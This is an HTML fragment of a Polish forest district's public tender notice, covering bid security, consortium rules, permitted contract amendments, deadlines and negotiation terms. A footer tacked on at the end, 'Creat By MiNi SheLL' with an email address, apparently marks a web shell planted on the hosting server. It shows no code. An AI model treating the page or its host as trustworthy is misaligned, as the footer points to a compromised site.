class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1 Wykonawca zobowiązany jest do wniesienia wadium w wysokości:<br/>1)	Dla części zamówienia nr 1 – 1.400,00 zł (słownie złotych: jeden tysiąc czterysta 00/100).<br/>2)	Dla części zamówienia nr 2 – 1.300,00 zł (słownie złotych: jeden tysiąc trzysta 00/100).<br/>3)	Dla części zamówienia nr 3 – 1.100,00 zł (słownie złotych: jeden tysiąc sto 00/100).<br/>4)	Dla części zamówienia nr 4 – 1.200,00 zł (słownie złotych: jeden tysiąc dwieście 00/100).<br/>2 Wadium musi zostać wniesione przed upływem terminu składania ofert, tj. do dnia 10 października 2023 do godziny 10:00, według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2020r. poz. 299).<br/>3 Wadium musi obejmować pełen okres związania ofertą tj. do dnia 8 listopada 2023 roku.<br/>4 Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: Bank BNP PARIBAS<br/>BANK POLSKA S.A. nr rachunku: 54 2030 0045 1110 0000 0040 3720 (w tytule przelewu zaleca się wpisać nazwę i<br/>sygnaturę postępowania). Wadium musi wpłynąć na wskazany rachunek bankowy najpóźniej przed upływem terminu<br/>składania ofert (decyduje data wpływu na rachunek bankowy Zamawiającego).<br/>5 Wadium wnoszone w formie poręczeń lub gwarancji należy załączyć do oferty w oryginale w postaci dokumentu<br/>elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę poręczenia lub gwarancji oraz<br/>powinno zawierać:<br/>1) wskazanie Beneficjenta poręczenia lub gwarancji, którym musi być: Nadleśnictwo Kościerzyna, ul. Marii Skłodowskiej-<br/>Curie 6, 83-400 Kościerzyna;<br/>2) nazwę i adres siedziby Wykonawcy;<br/>3) kwotę i termin ważności gwarancji/poręczenia;<br/>4) bezwarunkowe zobowiązanie wystawcy poręczenia lub gwarancji do zapłaty kwoty wadium, na pierwsze pisemne<br/>żądanie Zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.<br/>6 Zamawiający zwróci wadium na zasadach określonych w art. 98 ust. 1-5 ustawy Pzp.<br/>7 W przypadku, gdy Wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium<br/>nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98<br/>ust. 2 pkt 3 ustawy Pzp, Zamawiający odrzuci ofertę Wykonawcy na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>8 Zamawiający zatrzyma wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie gwarancji lub poręczenia,<br/>wystąpi odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium, w przypadkach określonych w art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy zobowiązani są do<br/>ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W takim przypadku do oferty należy dołączyć<br/>pełnomocnictwo wystawione przez osoby upoważnione. Przez Wykonawców wspólnie ubiegających się rozumie się również<br/>spółki cywilne.<br/>2 Pełnomocnictwo należy dołączyć do oferty i powinno ono zawierać w szczególności wskazanie:<br/>1) postępowania o udzielenie zamówienie publicznego, którego dotyczy;<br/>2) wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia;<br/>3) ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>3 Zamawiający informuje o treści przepisu art. 117 ust. 3 Pzp, zgodnie z którym w odniesieniu do warunków dotyczących<br/>wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>W związku z powyższym zgodnie z art. 117 ust. 4 Pzp Wykonawca jest zobowiązany załączyć do oferty podmiotowy środek<br/>dowodowy w postaci oświadczenia, z którego wynika, które usługi wykonają poszczególni Wykonawcy. Wzór stosownego<br/>oświadczenia został zawarty w Formularzu Oferty (stanowiącym załącznik nr 1 do SWZ) i Zamawiający zaleca złożyć to<br/>oświadczenie właśnie w tym formularzu. Obowiązek złożenia oświadczenia, o którym mowa w art. 117 ust. 4 Pzp odnosi się<br/>również do Wykonawców, prowadzących działalność w formie spółki cywilnej.<br/>4 W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokument „Oświadczenia o niepodleganiu<br/>wykluczeniu oraz spełnianiu warunków udziału”, o którym mowa w pkt. 9.1 SWZ, składa każdy z Wykonawców wspólnie<br/>ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału<br/>w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>5 Jeżeli oferta wspólna złożona przez dwóch lub więcej Wykonawców zostanie wyłoniona w prowadzonym postępowaniu<br/>jako najkorzystniejsza, przed podpisaniem umowy w sprawie zamówienia publicznego, Zamawiający zażąda w<br/>wyznaczonym terminie złożenia umowy regulującej współpracę tych wykonawców, podpisanej przez wszystkich partnerów,<br/>przy czym termin na jaki została zawarta nie może być krótszy niż termin realizacji zamówienia oraz winna zawierać:<br/>1) strony umowy z oznaczeniem pełnomocnika (lidera);<br/>2) cel zawarcia umowy;<br/>3) okres obowiązywania umowy konsorcjum (obejmujący okres realizacji przedmiotu zamówienia, gwarancji, rękojmi);<br/>4) solidarną odpowiedzialność każdego z wykonawców wspólnie ubiegających się o udzielenie zamówienia za wykonanie<br/>umowy oraz wniesienie zabezpieczenia należytego wykonania umowy; <br/>5) wyłączenie możliwości wypowiedzenia umowy konsorcjum przez któregokolwiek z wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia do czasu wykonania przedmiotu zamówienia;<br/>6) zakaz dokonywania zmian w umowie konsorcjum bez zgody Zamawiającego.<br/>6 Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców, o których mowa w pkt 12.1. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1) zmianę daty końca realizacji robót budowlanych na termin późniejszy, w przypadku:<br/>a) zaistnienia niesprzyjających warunków atmosferycznych (np. długotrwałe opady deszczu, śniegu, niskie temperatury<br/>uniemożliwiające prawidłowe wykonanie przedmiotu zamówienia lub jego części, nadmierne zawilgocenie podłoża i<br/>materiałów lub (i) w trakcie dokonywania odbiorów robót – gdy warunki te uniemożliwią prowadzenie robót zgodnie ze<br/>sztuką budowlaną.<br/>b) wystąpienia okoliczności polegających na braku dostępności przez Wykonawcę na rynku materiałów budowlanych do<br/>wykonania zamówienia objętego przedmiotem umowy, co uniemożliwia wykonanie umowy w pierwotnie ustalonym terminie.<br/>c) wystąpienia odmiennych od przyjętych w dokumentacji projektowej warunków geologicznych, w szczególności odmienne<br/>kategorie gruntu, wystąpienie utworów słabonośnych, kurzawki itp.,<br/>d) wystąpienia odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, w szczególności istnienie<br/>podziemnych urządzeń, instalacji lub obiektów infrastruktury, obiektów archeologicznych, konieczności prowadzenia prac<br/>wykopaliskowych itp.,<br/>e) wstrzymania robót przez Zamawiającego,<br/>f) konieczności usunięcia błędów lub (i) wprowadzenia zmian w dokumentacji projektowej,<br/>g) przekroczenia terminów wydania przez organy administracji decyzji, zezwoleń itp.,<br/>h) odmowy wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów lub (i) zmian w<br/>dokumentacji projektowej.<br/>W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt. 1) lit. a) – h) termin umowy może być wydłużony, o czas niezbędny do zakończenia wykonania jej przedmiotu w sposób należyty poprzez usunięcie lub ustąpienie<br/>okoliczności powodującej brak możliwości realizacji przedmiotu umowy. Z powyższego uprawnienia Zamawiający będzie<br/>mógł skorzystać w przypadku zaistnienia co najmniej jednej z wyżej określonych okoliczności.<br/>2) sposobu wykonania części przedmiotu zamówienia w przypadku, gdy w trakcie realizacji przedmiotu zamówienia<br/>zaistnieją okoliczności, takie jak:<br/>a) pojawienie się nowych materiałów lub technologii,<br/>b) konieczność zastosowania innych rozwiązań technicznych lub (i) technologicznych niż przewidzianych w umowie o<br/>zamówienie publiczne, w tym w dokumentacji projektowej, w sytuacji, gdy zastosowanie ich grozi niewykonaniem lub<br/>wadliwym wykonaniem zamówienia publicznego (przedmiotu umowy).<br/>c) wystąpienie odmiennych od przyjętych w dokumentacji projektowej warunków geologicznych, w szczególności odmienne<br/>kategorie gruntu, wystąpienie utworów słabonośnych, kurzawki itp., skutkujące niemożliwością zrealizowania przedmiotu<br/>zamówienia przy dotychczasowych założeniach technicznych lub (i) technologicznych.<br/>d) wystąpienie odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, w szczególności istnienie<br/>podziemnych urządzeń, instalacji lub obiektów infrastruktury, obiektów archeologicznych, konieczności prowadzenia prac<br/>wykopaliskowych itp.<br/>W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt. 2) lit. a) – d), Strony określą ilości i wartość<br/>niezbędnych do wykonania prac. W takich sytuacjach, Wykonawca będzie zobowiązany do wykonania kosztorysów robót<br/>dodatkowych lub (i) robót zamiennych lub (i) robót zaniechanych na podstawie protokołu konieczności, spisanego przez<br/>strony i zatwierdzonego przez Zamawiającego przy jednoczesnym zachowaniu tych samych cen i wskaźników, zawartych w<br/>kosztorysie ofertowym z oferty Wykonawcy, a jeżeli nie będzie to możliwe – ustalenie nowych cen jednostkowych w toku<br/>negocjacji warunków umowy.<br/>3) stawki podatku VAT – to znaczy, ceny netto określone w umowie/ofercie pozostają niezmienione przez cały okres<br/>obowiązywania umowy. Jeżeli w okresie obowiązywania umowy nastąpi zmiana stawki podatku od towarów i usług (VAT),<br/>od chwili zmiany podatek w nowej stawce będzie doliczany do dotychczasowych cen netto, bez konieczności zmiany umowy<br/>w drodze aneksu<br/>4) zmiany podwykonawcy albo dalszego podwykonawcy robót. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-10-10 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/lasy_koscierzyna</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-10-10 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-11-08</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Zamawiający przewiduje możliwość ograniczenia liczby wykonawców, których zaprosi do negocjacji do trzech<br/>Wykonawców, którzy uzyskali najwyższą punktację w zastosowanych w niniejszym postępowaniu kryteriach oceny ofert. <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający określa dodatkowa podstawę wykluczenia Wykonawcy z postępowania:<br/>Zamawiający wykluczy z postępowania o udzielenie zamówienia Wykonawcę, wobec którego zachodzą podstawy<br/>wykluczenia określone w art. 7 ust 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 r., poz.<br/>835).<br/>Zamawiający oceni brak podstaw wykluczenia Wykonawcy z postępowania odnośnie powyższej przesłanki na podstawie<br/>oświadczenia, o którym mowa w art.125 ust. 1 ustawy, a także w pkt. 5.5.) ogłoszenia o zamówieniu oraz w pkt. 5.11.) ppkt.<br/>2 ogłoszenia o zamówieniu.

Creat By MiNi SheLL
Email: jattceo@gmail.com